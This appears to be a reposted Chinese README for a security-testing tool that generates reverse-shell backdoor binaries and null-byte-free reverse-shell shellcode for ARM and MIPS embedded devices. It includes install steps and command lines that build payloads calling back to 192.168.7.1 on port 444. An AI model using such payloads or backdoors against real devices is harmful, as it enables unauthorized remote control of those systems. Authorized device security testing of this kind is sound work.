项目地址[在嵌入式设备的渗透和漏洞挖掘过程中,遇到了许多问题。一个是一些设备没有telnetd或ssh服务来获得交互式shell,另一个是内存损坏漏洞(如堆栈溢出)通常是空字节截断,因此构造反向shell代码更麻烦,因此开发此工具是为了利用该漏洞。该工具基于PWN模块开发,目前使用python2语言
项目地址github
功能该工具嵌入到设备的安全测试中。有两个主要功能:
1.生成各种架构的后门程序。后门程序是用反向shell汇编代码打包的,大小很小现在支持Armv5、Armv7、Armv8、mipsel和mips,仍在更新中
2.在攻击过程中生成各种架构的反向shell代码,且无空字节,这有助于攻击嵌入式设备上的内存损坏漏洞现在支持Armv5、Armv7、Armv8、mipsel和mips,仍在更新中
python2安装pwn模块
pip install pwn
使用nuitka 打包py生成ELF
nuitka hackEmbedded_tool.py
mv hackEmbedded_tool.exe hackEmbedded_tool
尽可能将生成后门shellcode的模块文件放入python2的site-packages中
sudo cp ./generate_* {your_dir}/site-packages
sudo cp ./extract_shellcode.py {your_dir}/site-packages
sudo cp ./hackEmbedded_tool /usr/bin/
可以在python终端下使用sys.path查找site-packages路径
Python 2.7.17 (default, Mar 18 2022, 13:21:42)
[GCC 7.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.path
怎么使用
要使用生成后门或反向shell汇编的机器码,需要指定ip地址、端口号、架构、endian(默认为armv7)
以下是生成不带空字节的反向shell机器码的示例
hackEmbedded_tool -reverse_ip 192.168.7.1 -reverse_port 444 -arch arm -endian little -exploit_shellcode 1
这是生成对应架构的后门文件的使用示列
hackEmbedded_tool -reverse_ip 192.168.7.1 -reverse_port 444 -arch arm -endian little -backdoor_file 1
使用-h可以查看命令提示
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)